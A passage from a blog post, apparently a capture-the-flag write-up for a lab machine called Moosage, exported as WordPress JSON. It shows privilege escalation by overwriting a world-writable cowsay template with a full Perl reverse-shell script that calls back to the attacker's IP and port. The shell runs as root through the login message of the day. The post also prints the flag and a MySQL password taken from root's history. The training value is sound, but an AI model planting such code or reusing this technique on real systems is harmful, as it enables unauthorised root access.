chmod 600 baca  \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ ssh baca@$IP -i baca\nbaca@192.168.10.106: Permission denied (publickey).<\/code><\/pre>\n<p>This may be a permissions problem:<\/p>\n<pre><code class=\"language-bash\">(remote) baca@moosage:\/home\/baca$ ls -la\ntotal 40\ndrwxr-xr-x 4 baca baca 4096 Jun 16 12:09 .\ndrwxr-xr-x 3 root root 4096 Apr 22  2021 ..\n-rw-r--r-- 1 baca baca  220 Apr 22  2021 .bash_logout\n-rw-r--r-- 1 baca baca 3526 Apr 22  2021 .bashrc\n-rwx--x--x 1 baca baca 1920 Apr 22  2021 flag.sh\ndrwxr-xr-x 3 baca baca 4096 Apr 22  2021 .local\n-rw-r--r-- 1 baca baca  807 Apr 22  2021 .profile\ndrwxrwxrwx 2 baca baca 4096 Jun 16 12:10 .ssh\n-rw------- 1 baca baca   13 Apr 22  2021 user.txt\n-rw------- 1 baca baca   53 Apr 22  2021 .Xauthority\n(remote) 
baca@moosage:\/home\/baca$ chmod 700 .ssh<\/code><\/pre>\n<p>After that, ssh login works:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040136.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040136.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617001303253\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>Let us find this <code>cowsay<\/code>: (do not ask me why it is cowsay; I have used it before, and you can also ask an AI or Google)<\/p>\n<pre><code class=\"language-bash\">baca@moosage:~$ find \/ -name &quot;*cowsay*&quot; 2&gt;\/dev\/null\n\/var\/lib\/dpkg\/info\/cowsay.list\n\/var\/lib\/dpkg\/info\/cowsay.md5sums\n\/var\/cache\/apt\/archives\/cowsay_3.03+dfsg2-6_all.deb\n\/usr\/share\/doc\/cowsay\n\/usr\/share\/doc\/cowsay\/examples\/cowsay_random\n\/usr\/share\/cowsay\n\/usr\/share\/bash-completion\/completions\/cowsay\n\/usr\/share\/man\/man6\/cowsay.6.gz\n\/usr\/games\/cowsay\nbaca@moosage:~$ whereis cowsay\ncowsay: \/usr\/games\/cowsay \/usr\/share\/cowsay \/usr\/share\/man\/man6\/cowsay.6.gz\nbaca@moosage:~$ ls -la \/usr\/games\/cowsay\n-rwxr-xr-x 1 root root 4664 Feb  3  2019 \/usr\/games\/cowsay\nbaca@moosage:~$ ls -la \/usr\/share\/cowsay\ntotal 12\ndrwxr-xr-x  3 root root 4096 Apr 22  2021 .\ndrwxr-xr-x 98 root root 4096 Apr 22  2021 ..\ndrwxr-xr-x  2 root root 4096 Apr 22  2021 cows\nbaca@moosage:~$ ls 
-la \/usr\/share\/cowsay\/cows\ntotal 192\ndrwxr-xr-x 2 root root 4096 Apr 22  2021 .\ndrwxr-xr-x 3 root root 4096 Apr 22  2021 ..\n-rw-rw-rw- 1 root root  115 Feb  3  2019 apt.cow\n-rw-rw-rw- 1 root root  310 Aug 14  1999 bud-frogs.cow\n-rw-rw-rw- 1 root root  123 Aug 14  1999 bunny.cow\n-rw-rw-rw- 1 root root 1127 Feb  3  2019 calvin.cow\n-rw-rw-rw- 1 root root  480 Aug 14  1999 cheese.cow\n-rw-rw-rw- 1 root root  181 Feb  3  2019 cock.cow\n-rw-rw-rw- 1 root root  230 Aug 14  1999 cower.cow\n-rw-rw-rw- 1 root root  569 Aug 14  1999 daemon.cow\n-rw-rw-rw- 1 root root  175 Aug 14  1999 default.cow\n-rw-rw-rw- 1 root root 1284 Nov  3  1999 dragon-and-cow.cow\n-rw-rw-rw- 1 root root 1000 Aug 14  1999 dragon.cow\n-rw-rw-rw- 1 root root  132 Feb  3  2019 duck.cow\n-rw-rw-rw- 1 root root  284 Aug 14  1999 elephant.cow\n-rw-rw-rw- 1 root root  357 Feb  3  2019 elephant-in-snake.cow\n-rw-rw-rw- 1 root root  585 Aug 14  1999 eyes.cow\n-rw-rw-rw- 1 root root  490 Aug 14  1999 flaming-sheep.cow\n-rw-rw-rw- 1 root root 1018 Aug 14  1999 ghostbusters.cow\n-rw-rw-rw- 1 root root 1054 Feb  3  2019 gnu.cow\n-rw-rw-rw- 1 root root  126 Aug 14  1999 hellokitty.cow\n-rw-rw-rw- 1 root root  687 Feb  3  2019 kangaroo.cow\n-rw-rw-rw- 1 root root  637 Aug 14  1999 kiss.cow\n-rw-rw-rw- 1 root root  162 Aug 14  1999 koala.cow\n-rw-rw-rw- 1 root root  406 Aug 14  1999 kosh.cow\n-rw-rw-rw- 1 root root  226 Feb  3  2019 luke-koala.cow\n-rw-rw-rw- 1 root root  814 Feb  3  2019 mech-and-cow.cow\n-rw-rw-rw- 1 root root  439 Aug 14  1999 milk.cow\n-rw-rw-rw- 1 root root  249 Feb  3  2019 moofasa.cow\n-rw-rw-rw- 1 root root  203 Aug 14  1999 moose.cow\n-rw-rw-rw- 1 root root 1623 Feb  3  2019 pony.cow\n-rw-rw-rw- 1 root root  305 Feb  3  2019 pony-smaller.cow\n-rw-rw-rw- 1 root root  252 Aug 14  1999 ren.cow\n-rw-rw-rw- 1 root root  234 Aug 14  1999 sheep.cow\n-rw-rw-rw- 1 root root  433 Aug 14  1999 skeleton.cow\n-rw-rw-rw- 1 root root  283 Feb  3  2019 snowman.cow\n-rw-rw-rw- 1 root root  854 
Aug 14  1999 stegosaurus.cow\n-rw-rw-rw- 1 root root  364 Aug 14  1999 stimpy.cow\n-rw-rw-rw- 1 root root  229 Feb  3  2019 suse.cow\n-rw-rw-rw- 1 root root  293 Aug 14  1999 three-eyes.cow\n-rw-rw-rw- 1 root root 1302 Aug 14  1999 turkey.cow\n-rw-rw-rw- 1 root root 1105 Aug 14  1999 turtle.cow\n-rw-rw-rw- 1 root root  215 Nov 12  1999 tux.cow\n-rw-rw-rw- 1 root root 1718 Feb  3  2019 unipony.cow\n-rw-rw-rw- 1 root root  365 Feb  3  2019 unipony-smaller.cow\n-rw-rw-rw- 1 root root  279 Aug 14  1999 vader.cow\n-rw-rw-rw- 1 root root  213 Aug 14  1999 vader-koala.cow\n-rw-rw-rw- 1 root root  248 Aug 14  1999 www.cow<\/code><\/pre>\n<p>Reference: <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/cowsay\/\">https:\/\/gtfobins.github.io\/gtfobins\/cowsay\/<\/a><\/p>\n<p>Many of the files turn out to be writable. Looking at one at random:<\/p>\n<pre><code class=\"language-bash\">baca@moosage:~$ cat \/usr\/share\/cowsay\/cows\/duck.cow\n# provided by G\u00fcrkan Seng\u00fcn &lt;gurkan@phys.ethz.ch&gt;\n$the_cow = &lt;&lt;&quot;EOC&quot;;\n $thoughts\n  $thoughts\n   $thoughts &gt;()_\n      (__)__ _\nEOC<\/code><\/pre>\n<p><code>.cow<\/code> files are all written in <code>Perl<\/code>, so I tried writing a shell into one to get a reverse connection. The earlier connection showed <code>cower.cow<\/code>, which means that file is definitely used, so I tried modifying it:<\/p>\n<p><a href=\"https:\/\/www.revshells.com\/\">https:\/\/www.revshells.com\/<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040137.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040137.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617001943737\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Attempting the hijack:<\/p>\n<pre><code class=\"language-bash\">baca@moosage:\/usr\/share\/cowsay\/cows$ nano cower.cow\nbaca@moosage:\/usr\/share\/cowsay\/cows$ cat cower.cow \n#!\/usr\/bin\/perl -w\n# perl-reverse-shell - A Reverse Shell implementation in PERL\n# Copyright (C) 2006 pentestmonkey@pentestmonkey.net\n#\n# This tool may be used for legal purposes only.  Users take full responsibility\n# for any actions performed using this tool.  The author accepts no liability\n# for damage caused by this tool.  If these terms are not acceptable to you, then\n# do not use this tool.\n#\n# In all other respects the GPL version 2 applies:\n#\n# This program is free software; you can redistribute it and\/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# This tool may be used for legal purposes only.  
Users take full responsibility\n# for any actions performed using this tool.  If these terms are not acceptable to\n# you, then do not use this tool.\n#\n# You are encouraged to send comments, improvements or suggestions to\n# me at pentestmonkey@pentestmonkey.net\n#\n# Description\n# -----------\n# This script will make an outbound TCP connection to a hardcoded IP and port.\n# The recipient will be given a shell running as the current user (apache normally).\n#\n\nuse strict;\nuse Socket;\nuse FileHandle;\nuse POSIX;\nmy $VERSION = &quot;1.0&quot;;\n\n# Where to send the reverse shell.  Change these.\nmy $ip = &#039;192.168.10.107&#039;;\nmy $port = 1234;\n\n# Options\nmy $daemon = 1;\nmy $auth   = 0; # 0 means authentication is disabled and any \n                # source IP can access the reverse shell\nmy $authorised_client_pattern = qr(^127\\.0\\.0\\.1$);\n\n# Declarations\nmy $global_page = &quot;&quot;;\nmy $fake_process_name = &quot;\/usr\/sbin\/apache&quot;;\n\n# Change the process name to be less conspicious\n$0 = &quot;[httpd]&quot;;\n\n# Authenticate based on source IP address if required\nif (defined($ENV{&#039;REMOTE_ADDR&#039;})) {\n        cgiprint(&quot;Browser IP address appears to be: $ENV{&#039;REMOTE_ADDR&#039;}&quot;);\n\n        if ($auth) {\n                unless ($ENV{&#039;REMOTE_ADDR&#039;} =~ $authorised_client_pattern) {\n                        cgiprint(&quot;ERROR: Your client isn&#039;t authorised to view this page&quot;);\n                        cgiexit();\n                }\n        }\n} elsif ($auth) {\n        cgiprint(&quot;ERROR: Authentication is enabled, but I couldn&#039;t determine your IP address.  
Denying access&quot;);\n        cgiexit(0);\n}\n\n# Background and dissociate from parent process if required\nif ($daemon) {\n        my $pid = fork();\n        if ($pid) {\n                cgiexit(0); # parent exits\n        }\n\n        setsid();\n        chdir(&#039;\/&#039;);\n        umask(0);\n}\n\n# Make TCP connection for reverse shell\nsocket(SOCK, PF_INET, SOCK_STREAM, getprotobyname(&#039;tcp&#039;));\nif (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {\n        cgiprint(&quot;Sent reverse shell to $ip:$port&quot;);\n        cgiprintpage();\n} else {\n        cgiprint(&quot;Couldn&#039;t open reverse shell to $ip:$port: $!&quot;);\n        cgiexit();\n}\n\n# Redirect STDIN, STDOUT and STDERR to the TCP connection\nopen(STDIN, &quot;&gt;&amp;SOCK&quot;);\nopen(STDOUT,&quot;&gt;&amp;SOCK&quot;);\nopen(STDERR,&quot;&gt;&amp;SOCK&quot;);\n$ENV{&#039;HISTFILE&#039;} = &#039;\/dev\/null&#039;;\nsystem(&quot;w;uname -a;id;pwd&quot;);\nexec({&quot;bash&quot;} ($fake_process_name, &quot;-i&quot;));\n\n# Wrapper around print\nsub cgiprint {\n        my $line = shift;\n        $line .= &quot;&lt;p&gt;\\n&quot;;\n        $global_page .= $line;\n}\n\n# Wrapper around exit\nsub cgiexit {\n        cgiprintpage();\n        exit 0; # 0 to ensure we don&#039;t give a 500 response.\n}\n\n# Form HTTP response using all the messages gathered by cgiprint so far\nsub cgiprintpage {\n        print &quot;Content-Length: &quot; . length($global_page) . &quot;\\r\nConnection: close\\r\nContent-Type: text\\\/html\\r\\n\\r\\n&quot; . 
$global_page;\n}<\/code><\/pre>\n<p>Set up a listener and try reconnecting over SSH:<\/p>\n<blockquote>\n<p>Note: I set up a listener on port 1234 again here, so the earlier pwncat-cs user session listening on 1234 has to be closed first!<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040138.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040138.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617002322052\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>On the other side, the shell came back:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040139.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040139.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617002336361\" style=\"zoom:33%;\" 
\/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) root@moosage:\/# cd ~\n(remote) root@moosage:\/root# ls -la\ntotal 32\ndrwx------  3 root root 4096 Apr 22  2021 .\ndrwxr-xr-x 18 root root 4096 Apr 22  2021 ..\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Apr 22  2021 .local\n-rw-------  1 root root  218 Apr 22  2021 .mysql_history\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rwx--x--x  1 root root 1920 Apr 22  2021 flag.sh\n-rw-------  1 root root   18 Apr 22  2021 root.txt\n(remote) root@moosage:\/root# cat .mysql_history\ncreate database moosage;\nCREATE USER &#039;baca&#039; IDENTIFIED BY &#039;youareinsane&#039;;\nGRANT USAGE ON *.* TO &#039;baca&#039;@localhost IDENTIFIED BY &#039;youareinsane&#039;;\nGRANT ALL privileges ON `moosage`.* TO &#039;baca&#039;@localhost;\nFLUSH PRIVILEGES;\n(remote) root@moosage:\/root# cd .local\n(remote) root@moosage:\/root\/.local# ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Apr 22  2021 .\ndrwx------ 3 root root 4096 Apr 22  2021 ..\ndrwx------ 3 root root 4096 Apr 22  2021 share\n(remote) root@moosage:\/root\/.local# cd share\/\n(remote) root@moosage:\/root\/.local\/share# ls -la\ntotal 12\ndrwx------ 3 root root 4096 Apr 22  2021 .\ndrwxr-xr-x 3 root root 4096 Apr 22  2021 ..\ndrwx------ 2 root root 4096 Apr 22  2021 nano\n(remote) root@moosage:\/root\/.local\/share# cd ..\/..\/\n(remote) root@moosage:\/root# .\/flag.sh \n\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  
\n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           
**                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m\n-------------------------\n\\nPWNED HOST: moosage\n\\nPWNED DATE: Mon Jun 16 12:24:30 EDT 2025\n\\nWHOAMI: uid=0(root) gid=0(root) groups=0(root)\n\\nFLAG: hmvyougotmooooooo\n\\n------------------------<\/code><\/pre>\n<p>I wanted to find out what that script was:<\/p>\n<pre><code class=\"language-bash\">(remote) root@moosage:\/opt# cat \/etc\/motd\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\n(remote) root@moosage:\/opt# cat \/usr\/share\/base-files\/motd\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\n(remote) root@moosage:\/opt# cat \/usr\/share\/doc\/util-linux\/examples\/motd\n\n       |^^^^^^|\n       |      |        _____________________ \n       |      |       \/                     \\\n       | (o)(o)      |                       |\n      @      _)      |     BOGUS man!!       
|\n       | ,___|     ,,|                       |\n       |   \/   ..&#039;&#039;  |                       |\n      \/____\\          \\_____________________\/\n\n(remote) root@moosage:\/opt# cat \/etc\/ssh\/sshd_config | grep ban\n# no default banner path\n(remote) root@moosage:\/usr\/games# grep &quot;cowsay&quot; \/etc\/motd \/etc\/update-motd.d\/*\n\/etc\/update-motd.d\/10-uname:\/usr\/games\/cowsay -f cower WELCOME TO MOOSAGE SYSTEM\n(remote) root@moosage:\/usr\/games# cat \/etc\/update-motd.d\/10-uname\n#!\/bin\/sh\n\/usr\/games\/cowsay -f cower WELCOME TO MOOSAGE SYSTEM\n(remote) root@moosage:\/usr\/games# ls -la \/etc\/update-motd.d\/10-uname\n-rwxr-xr-x 1 root root 63 Apr 22  2021 \/etc\/update-motd.d\/10-uname<\/code><\/pre>\n<p>So this is where it gets called, no wonder it can be used for privilege escalation. I just never got this far in my checks, sigh....<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Moosage Information gathering Port scanning \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage] \u2514\u2500$ r 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-880","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/880","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=880"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/880\/revisions"}],"predecessor-version":[{"id":881,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/880\/revisions\/881"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=880"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=880"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=880"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}